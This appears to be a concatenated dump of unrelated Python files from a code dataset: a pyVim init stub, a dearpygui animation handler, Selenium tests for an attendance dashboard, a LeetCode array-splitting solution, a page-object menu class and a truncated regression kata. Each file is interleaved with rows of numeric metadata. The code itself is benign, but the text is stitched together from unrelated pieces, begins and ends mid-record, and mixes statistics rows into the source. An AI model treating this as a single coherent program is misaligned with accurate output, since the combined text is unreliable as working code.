return Response(result) | 32.874809 | 117 | 0.559374 | 1,961 | 21,533 | 6.021928 | 0.062213 | 0.086375 | 0.060462 | 0.092133 | 0.927598 | 0.927598 | 0.907698 | 0.905157 | 0.886104 | 0.877128 | 0 | 0.000269 | 0.308364 | 21,533 | 655 | 118 | 32.874809 | 0.792654 | 0 | 0 | 0.777992 | 0 | 0 | 0.248212 | 0.052011 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065637 | false | 0 | 0.011583 | 0 | 0.216216 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
38c67ac74f14a382596a341d57553383fea6c02b | 175 | py | Python | venv/lib/python2.7/site-packages/pyVim/__init__.py | haind27/test01 | 7f86c0a33eb0874a6c3f5ff9a923fd0cfc8ef852 | [
"MIT"
] | null | null | null | venv/lib/python2.7/site-packages/pyVim/__init__.py | haind27/test01 | 7f86c0a33eb0874a6c3f5ff9a923fd0cfc8ef852 | [
"MIT"
] | null | null | null | venv/lib/python2.7/site-packages/pyVim/__init__.py | haind27/test01 | 7f86c0a33eb0874a6c3f5ff9a923fd0cfc8ef852 | [
"MIT"
] | null | null | null | ## @file pyVim/__init__.py
## @brief A client-side Python API that wraps pyVmomi.
##
##
##
## @mainpage
##
## A client-side Python API that wraps pyVmomi.
##
##
| 13.461538 | 55 | 0.594286 | 22 | 175 | 4.545455 | 0.636364 | 0.14 | 0.22 | 0.34 | 0.72 | 0.72 | 0.72 | 0.72 | 0 | 0 | 0 | 0 | 0.24 | 175 | 12 | 56 | 14.583333 | 0.75188 | 0.742857 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aa500d5b59f34c1fb0ea84083a46eb518c249a0d | 4,052 | py | Python | guiHandling/animationHandler.py | Mstpyt/Faceit-Overlay | e76165817bc121fbc570edd874a2c117817e7a12 | [
"MIT"
] | 6 | 2021-04-10T13:36:46.000Z | 2021-08-08T17:35:38.000Z | guiHandling/animationHandler.py | kvanja19/Faceit-Overlay | e76165817bc121fbc570edd874a2c117817e7a12 | [
"MIT"
] | 1 | 2021-05-16T17:23:38.000Z | 2021-05-17T19:49:56.000Z | guiHandling/animationHandler.py | kvanja19/Faceit-Overlay | e76165817bc121fbc570edd874a2c117817e7a12 | [
"MIT"
] | 2 | 2021-05-13T06:59:20.000Z | 2021-11-02T10:25:50.000Z | from time import sleep
from dearpygui import core
import logging
import math
""" -------------------------------------------------------------------------------------------------------------------
Animation open Close config
---------------------------------------------------------------------------------------------------------------------"""
def animation_config_color():
i = 0
logging.info("start animation config_color")
conf = core.get_item_configuration("##Config")
helper = core.get_item_configuration("##Help")
if helper["show"] is True:
core.configure_item("##Help", show=False)
core.configure_item("##Config_Colors", show=True)
core.configure_item("##Web", show=False)
return
if conf["width"] < 350:
core.configure_item("##Config_Colors", show=True)
core.configure_item("##Help", show=False)
core.configure_item("##Web", show=False)
while i <= 1:
x_pos = int((1 - math.pow((1 - i), 8)) * 50)
i += 0.03
core.configure_item("##Config", x_pos=0, width=380 + x_pos)
sleep(0.001)
else:
core.configure_item("##Config_Colors", show=False)
core.configure_item("##Help", show=False)
core.configure_item("##Web", show=False)
while i <= 1:
x_pos = int((1 - math.pow((1 - i), 8)) * 50)
i += 0.03
core.configure_item("##Config", x_pos=0, width=60 - x_pos)
sleep(0.001)
logging.info("end animation config_color")
def animation_config_help():
logging.info("start animation config_help")
i = 0
helper = core.get_item_configuration("##Config")
conf = core.get_item_configuration("##Config_Colors")
if conf["show"] is True:
core.configure_item("##Help", show=True)
core.configure_item("##Config_Colors", show=False)
core.configure_item("##Web", show=False)
return
if helper["width"] < 350:
core.configure_item("##Config_Colors", show=False)
core.configure_item("##Web", show=False)
core.configure_item("##Help", show=True)
while i <= 1:
x_pos = int((1 - math.pow((1 - i), 8)) * 50)
i += 0.03
core.configure_item("##Config", x_pos=0, width=380 + x_pos)
sleep(0.001)
else:
core.configure_item("##Config_Colors", show=False)
core.configure_item("##Help", show=False)
core.configure_item("##Web", show=False)
while i <= 1:
x_pos = int((1 - math.pow((1 - i), 8)) * 50)
i += 0.03
core.configure_item("##Config", x_pos=0, width=60 - x_pos)
sleep(0.001)
logging.info("end animation config_help")
def animation_config_web():
logging.info("start animation config_web")
i = 0
web = core.get_item_configuration("##Config")
conf = core.get_item_configuration("##Config_Colors")
if conf["show"] is True:
core.configure_item("##Web", show=True)
core.configure_item("##Config_Colors", show=False)
core.configure_item("##Help", show=False)
if web["width"] < 350:
core.configure_item("##Config_Colors", show=False)
core.configure_item("##Web", show=True)
core.configure_item("##Help", show=False)
while i <= 1:
x_pos = int((1 - math.pow((1 - i), 8)) * 50)
i += 0.03
core.configure_item("##Config", x_pos=0, width=380 + x_pos)
sleep(0.001)
else:
core.configure_item("##Config_Colors", show=False)
core.configure_item("##Web", show=False)
core.configure_item("##Help", show=False)
while i <= 1:
x_pos = int((1 - math.pow((1 - i), 8)) * 50)
i += 0.03
core.configure_item("##Config", x_pos=0, width=60 - x_pos)
sleep(0.001)
logging.info("end animation config_web")
| 40.118812 | 121 | 0.52542 | 491 | 4,052 | 4.160896 | 0.099796 | 0.209985 | 0.274596 | 0.168869 | 0.894763 | 0.83162 | 0.81302 | 0.81302 | 0.790504 | 0.787078 | 0 | 0.037678 | 0.272952 | 4,052 | 100 | 122 | 40.52 | 0.655804 | 0 | 0 | 0.766667 | 0 | 0 | 0.144231 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.044444 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
aaa8e74495ff0ef878877e6b8abbd1d2316797c2 | 19,335 | py | Python | tests/src/Teacher_Attendance/tar_time_series.py | sreenivas8084/cQube | 3352a13f41679d707979e287d1880f0723b27510 | [
"MIT"
] | null | null | null | tests/src/Teacher_Attendance/tar_time_series.py | sreenivas8084/cQube | 3352a13f41679d707979e287d1880f0723b27510 | [
"MIT"
] | 2 | 2022-02-01T00:55:12.000Z | 2022-03-29T22:29:09.000Z | tests/src/Teacher_Attendance/tar_time_series.py | SreenivasNimmagadda/cQube | 3352a13f41679d707979e287d1880f0723b27510 | [
"MIT"
] | null | null | null | import csv
import os
import re
import time
from selenium.webdriver.support.select import Select
from Data.parameters import Data
from filenames import file_extention
from get_dir import pwd
from reuse_func import GetData
class time_series():
def __init__(self,driver):
self.driver = driver
def check_time_series_dropdown(self):
self.data = GetData()
count = 0
self.driver.find_element_by_xpath(Data.hyper_link).click()
self.data.page_loading(self.driver)
timeperiod = Select(self.driver.find_element_by_id('period'))
for i in range(1,len(timeperiod.options)):
timeperiod.select_by_index(i)
self.data.page_loading(self.driver)
print(timeperiod.options[i].text ,'is selected and displayed on screen')
if 'No data found' in self.driver.page_source:
print(timeperiod.options[i].text ,"is not having Data")
else:
markers = self.driver.find_elements_by_xpath(Data.dots)
dots = len(markers)-1
if dots == 0:
count = count + 1
print('Markers are not present on screen')
return count
def check_time_series_dropdown_options(self):
self.data = GetData()
count = 0
self.driver.find_element_by_xpath(Data.hyper_link).click()
self.data.page_loading(self.driver)
timeperiod = Select(self.driver.find_element_by_id('period'))
count = len(timeperiod.options)-1
return count
def check_time_overall_series_dropdown(self):
self.data = GetData()
count = 0
self.p = pwd()
self.driver.find_element_by_xpath(Data.hyper_link).click()
self.data.page_loading(self.driver)
timeperiods = Select(self.driver.find_element_by_id('period'))
timeperiods.select_by_visible_text(' Overall ')
self.data.page_loading(self.driver)
if 'No data found' in self.driver.page_source:
print("Overall is not having Data")
else:
markers = self.driver.find_elements_by_class_name(Data.dots)
dots = len(markers) - 1
if markers == 0:
print('Markers are not present on screen ')
count = count + 1
else:
self.driver.find_element_by_id(Data.Download).click()
time.sleep(3)
self.filename = self.p.get_download_dir() + '/' + "District_wise_report_January_2021.csv"
if os.path.isfile(self.filename) != True:
print("Over all time series csv file is not downloaded")
else:
with open(self.filename) as fin:
csv_reader = csv.reader(fin, delimiter=',')
header = next(csv_reader)
schools = 0
student = 0
for row in csv.reader(fin):
schools += int(row[4])
student += int(row[3])
school = self.driver.find_element_by_id("schools").text
sc = re.sub('\D', "", school)
stds = self.driver.find_element_by_id("students").text
std = re.sub('\D', "", stds)
if int(sc) != int(schools):
print("school count mismatched", int(sc), int(schools))
count = count + 1
if int(student) != int(std):
print("student count mismatched", int(sc), int(schools))
count = count + 1
os.remove(self.filename)
return count
def check_time_series_last_7_days(self):
cal = GetData()
self.p = pwd()
count = 0
self.file = file_extention()
cal.click_on_state(self.driver)
timeperiods = Select(self.driver.find_element_by_id('period'))
timeperiods.select_by_visible_text(' Last 7 Days ')
cal.page_loading(self.driver)
if 'No data found' in self.driver.page_source:
print("Last 7 days is not having Data")
else:
markers = self.driver.find_elements_by_class_name(Data.dots)
dots = len(markers) - 1
if markers == 0:
print('Markers are not present on screen ')
count = count + 1
else:
self.driver.find_element_by_id(Data.Download).click()
time.sleep(3)
self.filename = self.p.get_download_dir() + '/' + "District_wise_report_January_2021.csv"
if os.path.isfile(self.filename) != True:
print(" Last 7 Days time series csv file is not downloaded")
else:
with open(self.filename) as fin:
csv_reader = csv.reader(fin, delimiter=',')
header = next(csv_reader)
schools = 0
student = 0
for row in csv.reader(fin):
schools += int(row[4])
student += int(row[3])
school = self.driver.find_element_by_id("schools").text
sc = re.sub('\D', "", school)
stds = self.driver.find_element_by_id("students").text
std = re.sub('\D', "", stds)
if int(sc) != int(schools):
print("school count mismatched", int(sc), int(schools))
count = count + 1
if int(student) != int(std):
print("student count mismatched", int(sc), int(schools))
count = count + 1
os.remove(self.filename)
return count
def check_time_series_last_30_days(self):
cal = GetData()
self.p = pwd()
count = 0
self.file = file_extention()
cal.click_on_state(self.driver)
self.year,self.month = cal.get_student_month_and_year_values()
timeperiods = Select(self.driver.find_element_by_id('period'))
timeperiods.select_by_visible_text(' Last 30 Days ')
cal.page_loading(self.driver)
if 'No data found' in self.driver.page_source:
print("Last 30 days is not having Data")
else:
markers = self.driver.find_elements_by_class_name(Data.dots)
dots = len(markers) - 1
if markers == 0:
print('Markers are not present on screen ')
count = count + 1
else:
cal.page_loading(self.driver)
self.driver.find_element_by_id(Data.Download).click()
time.sleep(5)
self.filename = self.p.get_download_dir() + '/' + "District_wise_report_"+self.month+"_"+self.year+".csv"
if os.path.isfile(self.filename) != True:
print(" Last 30 Days time series csv file is not downloaded")
else:
with open(self.filename) as fin:
csv_reader = csv.reader(fin, delimiter=',')
header = next(csv_reader)
schools = 0
student = 0
for row in csv.reader(fin):
schools += int(row[4])
student += int(row[3])
school = self.driver.find_element_by_id("schools").text
sc = re.sub('\D', "", school)
stds = self.driver.find_element_by_id("students").text
std = re.sub('\D', "", stds)
if int(sc) != int(schools):
print("school count mismatched", int(sc), int(schools))
count = count + 1
if int(student) != int(std):
print("student count mismatched", int(sc), int(schools))
count = count + 1
os.remove(self.filename)
return count
def check_time_series_day(self):
cal = GetData()
self.p = pwd()
count = 0
self.file = file_extention()
cal.click_on_state(self.driver)
self.year,self.month = cal.get_student_month_and_year_values()
timeperiods = Select(self.driver.find_element_by_id('period'))
timeperiods.select_by_visible_text(' Last Day ')
cal.page_loading(self.driver)
if 'No data found' in self.driver.page_source:
print("Last Day is not having Data")
else:
markers = self.driver.find_elements_by_class_name(Data.dots)
dots = len(markers) - 1
if markers == 0:
print('Markers are not present on screen ')
count = count + 1
else:
cal.page_loading(self.driver)
self.driver.find_element_by_id(Data.Download).click()
time.sleep(5)
self.filename = self.p.get_download_dir() + '/' + "District_wise_report_"+self.month+"_"+self.year+".csv"
if os.path.isfile(self.filename) != True:
print(" Last Day time series csv file is not downloaded")
else:
with open(self.filename) as fin:
csv_reader = csv.reader(fin, delimiter=',')
header = next(csv_reader)
schools = 0
student = 0
for row in csv.reader(fin):
schools += int(row[4])
student +=int(row[3])
school = self.driver.find_element_by_id("schools").text
sc = re.sub('\D', "", school)
stds = self.driver.find_element_by_id("students").text
std = re.sub('\D', "", stds)
if int(sc) != int(schools):
print("school count mismatched", int(sc), int(schools))
count = count + 1
if int(student) != int(std):
print("student count mismatched", int(sc), int(schools))
count = count + 1
os.remove(self.filename)
return count
def check_time_series_month_and_year(self):
cal = GetData()
self.p = pwd()
count = 0
self.file = file_extention()
cal.click_on_state(self.driver)
self.year,self.month = cal.get_student_month_and_year_values()
timeperiods = Select(self.driver.find_element_by_id('period'))
timeperiods.select_by_visible_text(' Year and Month ')
cal.page_loading(self.driver)
if 'No data found' in self.driver.page_source:
print("Year and month is not having Data")
else:
markers = self.driver.find_elements_by_class_name(Data.dots)
dots = len(markers) - 1
if markers == 0:
print('Markers are not present on screen ')
count = count + 1
else:
cal.page_loading(self.driver)
self.driver.find_element_by_id(Data.Download).click()
time.sleep(5)
self.filename = self.p.get_download_dir() + '/' + "District_wise_report_"+self.month+"_"+self.year+".csv"
if os.path.isfile(self.filename) != True:
print(" Last Day time series csv file is not downloaded")
else:
with open(self.filename) as fin:
csv_reader = csv.reader(fin, delimiter=',')
header = next(csv_reader)
schools = 0
student = 0
for row in csv.reader(fin):
schools += int(row[4])
student += int(row[3])
school = self.driver.find_element_by_id("schools").text
sc = re.sub('\D', "", school)
stds = self.driver.find_element_by_id("students").text
std = re.sub('\D', "", stds)
if int(sc) != int(schools):
print("school count mismatched", int(sc), int(schools))
count = count + 1
if int(student) != int(std):
print("student count mismatched", int(sc), int(schools))
count = count + 1
os.remove(self.filename)
return count
def check_year_and_month_dropdowns_csv_download(self):
cal = GetData()
self.p = pwd()
count = 0
self.file = file_extention()
cal.click_on_state(self.driver)
timeperiods = Select(self.driver.find_element_by_id('period'))
timeperiods.select_by_visible_text(' Year and Month ')
cal.page_loading(self.driver)
if 'No data found' in self.driver.page_source:
print("Year and month is not having Data")
else:
markers = self.driver.find_elements_by_class_name(Data.dots)
dots = len(markers) - 1
if markers == 0:
print('Markers are not present on screen ')
count = count + 1
else:
cal.page_loading(self.driver)
year = Select(self.driver.find_element_by_id('year'))
month = Select(self.driver.find_element_by_id('month'))
for i in range(1,len(year.options)):
year.select_by_index(i)
cal.page_loading(self.driver)
for j in range(1,len(month.options)):
month.select_by_index(j)
cal.page_loading(self.driver)
self.driver.find_element_by_id(Data.Download).click()
time.sleep(5)
self.filename = self.p.get_download_dir() + '/' + "District_wise_report_"+month.options[j].text+"_"+year.options[i].text+".csv"
print(self.filename)
if os.path.isfile(self.filename) != True:
print(year.options[i].text,month.options[j].text,"time series csv file is not downloaded")
else:
with open(self.filename) as fin:
csv_reader = csv.reader(fin, delimiter=',')
header = next(csv_reader)
schools = 0
student = 0
for row in csv.reader(fin):
schools += int(row[4])
student += int(row[3])
school = self.driver.find_element_by_id("schools").text
sc = re.sub('\D', "", school)
stds = self.driver.find_element_by_id("students").text
std = re.sub('\D', "", stds)
if int(sc) != int(schools):
print("school count mismatched", int(sc), int(schools))
count = count + 1
if int(student) != int(std):
print("student count mismatched", int(sc), int(schools))
count = count + 1
os.remove(self.filename)
return count
def check_select_time_series_and_click_on_block_cluster_school_btns(self):
self.data = GetData()
count = 0
self.driver.find_element_by_xpath(Data.hyper_link).click()
self.data.page_loading(self.driver)
timeperiod = Select(self.driver.find_element_by_id('period'))
for i in range(1, len(timeperiod.options)):
timeperiod.select_by_index(i)
self.data.page_loading(self.driver)
print(timeperiod.options[i].text, 'is selected and displayed on screen')
if 'No data found' in self.driver.page_source:
print(timeperiod.options[i].text ,"is not having Data")
else:
cur_students = self.driver.find_element_by_id(Data.students).text
cur_schools = self.driver.find_element_by_id(Data.schoolcount).text
cstudents = re.sub('\D', '', cur_students)
cschools = re.sub('\D', '', cur_schools)
blk = self.driver.find_element_by_id(Data.SAR_Blocks_btn).click()
self.data.page_loading(self.driver)
blk_students = self.driver.find_element_by_id(Data.students).text
blk_schools = self.driver.find_element_by_id(Data.schoolcount).text
bstudents = re.sub('\D','',blk_students)
bschools =re.sub('\D','',blk_schools)
cls = self.driver.find_element_by_id(Data.SAR_Clusters_btn).click()
self.data.page_loading(self.driver)
cls_students = self.driver.find_element_by_id(Data.students).text
cls_schools = self.driver.find_element_by_id(Data.schoolcount).text
cl_students = re.sub('\D', '', cls_students)
cl_schools = re.sub('\D', '', cls_schools)
sc = self.driver.find_element_by_id(Data.SAR_Schools_btn).click()
self.data.page_loading(self.driver)
sc_students = self.driver.find_element_by_id(Data.students).text
sc_schools = self.driver.find_element_by_id(Data.schoolcount).text
s_students = re.sub('\D', '', sc_students)
s_schools = re.sub('\D', '', sc_schools)
count = 0
if int(cur_schools) != int(bschools):
print('Block level mismatch fount footers',cur_schools , bschools)
count = count + 1
if int(cur_students) != int(bstudents):
print('Block level mismatch fount footers', cur_students, blk_students)
count = count + 1
if int(cur_schools) != int(cl_schools):
print('Cluster level mismatch fount footers', cur_schools, cl_schools)
count = count + 1
if int(cur_students) != int(cl_students):
print('Cluster level mismatch fount footers', cur_students, cl_students)
count = count + 1
if int(cur_schools) != int(s_schools):
print('School level mismatch fount footers', cur_schools, s_schools)
count = count + 1
if int(cur_students) != int(s_students):
print('School level mismatch fount footers', cur_students, s_students)
count = count + 1
return count
| 48.580402 | 151 | 0.512801 | 2,155 | 19,335 | 4.417169 | 0.068677 | 0.091396 | 0.075008 | 0.097069 | 0.898204 | 0.889274 | 0.879084 | 0.841895 | 0.813321 | 0.791785 | 0 | 0.008769 | 0.386605 | 19,335 | 397 | 152 | 48.702771 | 0.793845 | 0 | 0 | 0.799465 | 0 | 0 | 0.09641 | 0.008172 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026738 | false | 0 | 0.024064 | 0 | 0.07754 | 0.112299 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aab47bb89be3b2d1405b74d808fad6b3a179df6d | 6,327 | py | Python | leetcode/hard/Split_Array_Largest_Sum.py | shhuan/algorithms | 2830c7e2ada8dfd3dcdda7c06846116d4f944a27 | [
"MIT"
] | null | null | null | leetcode/hard/Split_Array_Largest_Sum.py | shhuan/algorithms | 2830c7e2ada8dfd3dcdda7c06846116d4f944a27 | [
"MIT"
] | null | null | null | leetcode/hard/Split_Array_Largest_Sum.py | shhuan/algorithms | 2830c7e2ada8dfd3dcdda7c06846116d4f944a27 | [
"MIT"
] | 1 | 2022-03-09T04:52:55.000Z | 2022-03-09T04:52:55.000Z | # -*- coding: utf-8 -*-
import bisect
"""
Given an array which consists of non-negative integers and an integer m, you can split the array into m non-empty continuous subarrays. Write an algorithm to minimize the largest sum among these m subarrays.
Note:
If n is the length of array, assume the following constraints are satisfied:
1 ≤ n ≤ 1000
1 ≤ m ≤ min(50, n)
Examples:
Input:
nums = [7,2,5,10,8]
m = 2
Output:
18
Explanation:
There are four ways to split nums into two subarrays.
The best way is to split it into [7,2,5] and [10,8],
where the largest sum among the two subarrays is only 18.
"""
import time
class Solution(object):
def splitArray(self, nums, m):
"""
:type nums: List[int]
:type m: int
:rtype: int
"""
N = len(nums)
A = nums
left = [0] * (N + 1)
for i in range(1, N + 1):
left[i] = left[i - 1] + A[i - 1]
def check(val, numsplit):
i, v, c = 0, 0, 0
while i < N + 1:
c += 1
j = bisect.bisect_right(left, v + val, i)
if i == j: ## v+val <= left[i]
return False
i = j
v = left[i - 1]
return c <= numsplit
lo = left[1]
hi = left[-1]
while lo < hi:
mid = lo + (hi - lo) // 2
if check(mid, m):
hi = mid
else:
lo = mid + 1
return lo
def splitArray2(self, nums, m):
"""
:type nums: List[int]
:type m: int
:rtype: int
"""
N = len(nums)
dp = [[float('inf') for _ in range(m + 1)] for _ in range(N + 1)]
sm = 0
for i in range(N):
dp[i][1] = sm
sm += nums[i]
dp[N][1] = sm
for i in range(1, N + 1):
for j in range(1, min(m + 1, i + 1)):
# dp[i][j] = min{max{dp[i-k][j-1], sum(i-k:i)}}, 前i个数字分成j份,其中的最大和
sm = 0
for k in range(1, i - j + 2):
sm += nums[i - k]
if sm > dp[i][j]: # nums are all positive integers
break
dp[i][j] = min(dp[i][j], max(dp[i - k][j - 1], sm))
return dp[N][m]
s = Solution()
t0 = time.time()
print(s.splitArray([1,4,4], 3))
# print(s.splitArray([1,2147483646], 2))
# print(s.splitArray([499,498,497,496,495,494,493,492,491,490,489,488,487,486,485,484,483,482,481,480,479,478,477,476,475,474,473,472,471,470,469,468,467,466,465,464,463,462,461,460,459,458,457,456,455,454,453,452,451,450,449,448,447,446,445,444,443,442,441,440,439,438,437,436,435,434,433,432,431,430,429,428,427,426,425,424,423,422,421,420,419,418,417,416,415,414,413,412,411,410,409,408,407,406,405,404,403,402,401,400,399,398,397,396,395,394,393,392,391,390,389,388,387,386,385,384,383,382,381,380,379,378,377,376,375,374,373,372,371,370,369,368,367,366,365,364,363,362,361,360,359,358,357,356,355,354,353,352,351,350,349,348,347,346,345,344,343,342,341,340,339,338,337,336,335,334,333,332,331,330,329,328,327,326,325,324,323,322,321,320,319,318,317,316,315,314,313,312,311,310,309,308,307,306,305,304,303,302,301,300,299,298,297,296,295,294,293,292,291,290,289,288,287,286,285,284,283,282,281,280,279,278,277,276,275,274,273,272,271,270,269,268,267,266,265,264,263,262,261,260,259,258,257,256,255,254,253,252,251,250,249,248,247,246,245,244,243,242,241,240,239,238,237,236,235,234,233,232,231,230,229,228,227,226,225,224,223,222,221,220,219,218,217,216,215,214,213,212,211,210,209,208,207,206,205,204,203,202,201,200,199,198,197,196,195,194,193,192,191,190,189,188,187,186,185,184,183,182,181,180,179,178,177,176,175,174,173,172,171,170,169,168,167,166,165,164,163,162,161,160,159,158,157,156,155,154,153,152,151,150,149,148,147,146,145,144,143,142,141,140,139,138,137,136,135,134,133,132,131,130,129,128,127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48,47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,32,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,0], 50))
print(time.time() - t0)
t0 = time.time()
print(s.splitArray2([499,498,497,496,495,494,493,492,491,490,489,488,487,486,485,484,483,482,481,480,479,478,477,476,475,474,473,472,471,470,469,468,467,466,465,464,463,462,461,460,459,458,457,456,455,454,453,452,451,450,449,448,447,446,445,444,443,442,441,440,439,438,437,436,435,434,433,432,431,430,429,428,427,426,425,424,423,422,421,420,419,418,417,416,415,414,413,412,411,410,409,408,407,406,405,404,403,402,401,400,399,398,397,396,395,394,393,392,391,390,389,388,387,386,385,384,383,382,381,380,379,378,377,376,375,374,373,372,371,370,369,368,367,366,365,364,363,362,361,360,359,358,357,356,355,354,353,352,351,350,349,348,347,346,345,344,343,342,341,340,339,338,337,336,335,334,333,332,331,330,329,328,327,326,325,324,323,322,321,320,319,318,317,316,315,314,313,312,311,310,309,308,307,306,305,304,303,302,301,300,299,298,297,296,295,294,293,292,291,290,289,288,287,286,285,284,283,282,281,280,279,278,277,276,275,274,273,272,271,270,269,268,267,266,265,264,263,262,261,260,259,258,257,256,255,254,253,252,251,250,249,248,247,246,245,244,243,242,241,240,239,238,237,236,235,234,233,232,231,230,229,228,227,226,225,224,223,222,221,220,219,218,217,216,215,214,213,212,211,210,209,208,207,206,205,204,203,202,201,200,199,198,197,196,195,194,193,192,191,190,189,188,187,186,185,184,183,182,181,180,179,178,177,176,175,174,173,172,171,170,169,168,167,166,165,164,163,162,161,160,159,158,157,156,155,154,153,152,151,150,149,148,147,146,145,144,143,142,141,140,139,138,137,136,135,134,133,132,131,130,129,128,127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48,47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,32,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,0], 50))
print(time.time() - t0)
| 57 | 1,918 | 0.627312 | 1,387 | 6,327 | 2.862293 | 0.437635 | 0.012343 | 0.00806 | 0.008312 | 0.752645 | 0.744584 | 0.74005 | 0.732997 | 0.732997 | 0.732997 | 0 | 0.537653 | 0.158369 | 6,327 | 110 | 1,919 | 57.518182 | 0.207136 | 0.345187 | 0 | 0.192308 | 0 | 0 | 0.00086 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0 | 0.038462 | 0 | 0.192308 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
aaceb836eb3ef028f3048896b48ad8820fab2d12 | 1,810 | py | Python | e2e/api/components/menu_component.py | Tomekske/AutoUpdater | a37136895c61ac9f7b5da30b376be49d033442be | [
"MIT"
] | null | null | null | e2e/api/components/menu_component.py | Tomekske/AutoUpdater | a37136895c61ac9f7b5da30b376be49d033442be | [
"MIT"
] | null | null | null | e2e/api/components/menu_component.py | Tomekske/AutoUpdater | a37136895c61ac9f7b5da30b376be49d033442be | [
"MIT"
] | null | null | null | class Menu():
'''Class to model the menu component'''
def __init__(self, driver):
'''Menu constructor
Args:
driver: Driver object
'''
self.driver = driver
def click_add_album_item(self):
'''Click on the add album button'''
xpath = "/html/body/app-root/div/div[2]/div[1]/app-menu/div/ng-material-multilevel-menu/div/mat-list/ng-list-item[3]/mat-list-item/div/a/div"
# selector = "#test-open-album-id"
self.driver.click_by_xpath(xpath)
def click_add_library_item(self):
'''Click on the add library button'''
xpath_collapse = "/html/body/app-root/div/div[2]/div[1]/app-menu/div/ng-material-multilevel-menu/div/mat-list/ng-list-item[1]/mat-list-item/div"
xpath_add = "/html/body/app-root/div/div[2]/div[1]/app-menu/div/ng-material-multilevel-menu/div/mat-list/ng-list-item[1]/div/ng-list-item[2]/mat-list-item/div/a/div"
# Open the menu before clicking on the add library item
self.driver.click_by_xpath(xpath_collapse)
# Click on the add library item
self.driver.click_by_xpath(xpath_add)
def click_add_collection_item(self):
'''Click on the add collection button'''
xpath_collapse = "/html/body/app-root/div/div[2]/div[1]/app-menu/div/ng-material-multilevel-menu/div/mat-list/ng-list-item[2]/mat-list-item/div/a/div[1]"
xpath_add = "/html/body/app-root/div/div[2]/div[1]/app-menu/div/ng-material-multilevel-menu/div/mat-list/ng-list-item[2]/div/ng-list-item[2]/mat-list-item/div/a/div"
# Open the menu before clicking on the add library item
self.driver.click_by_xpath(xpath_collapse)
# Click on the add library item
self.driver.click_by_xpath(xpath_add)
| 44.146341 | 173 | 0.651381 | 291 | 1,810 | 3.945017 | 0.151203 | 0.083624 | 0.04878 | 0.05662 | 0.802265 | 0.796167 | 0.702091 | 0.702091 | 0.702091 | 0.702091 | 0 | 0.012431 | 0.2 | 1,810 | 40 | 174 | 45.25 | 0.780387 | 0.210497 | 0 | 0.25 | 0 | 0.3125 | 0.50696 | 0.50696 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
2aa9454922d8f497f389c844839592b553695ce1 | 8,706 | py | Python | katas/kata12.py | cesarau04/metodosnumericos | 9670c91d5c659d2bfb1b95e85c437e6deed9ec28 | [
"MIT"
] | null | null | null | katas/kata12.py | cesarau04/metodosnumericos | 9670c91d5c659d2bfb1b95e85c437e6deed9ec28 | [
"MIT"
] | null | null | null | katas/kata12.py | cesarau04/metodosnumericos | 9670c91d5c659d2bfb1b95e85c437e6deed9ec28 | [
"MIT"
] | null | null | null | # Regresion polinomial
import matplotlib.pyplot as plt
import numpy as np
def createMatrix(m,n, valor=0):
C = []
for i in range(m):
C.append([]) #could be c.append([valor]*n)
for j in range(n):
C[i].append(valor)
return C
def getDimensions(A):
return (len(A),len(A[0]))
def copyMatrix(B):
m,n = getDimensions(B)
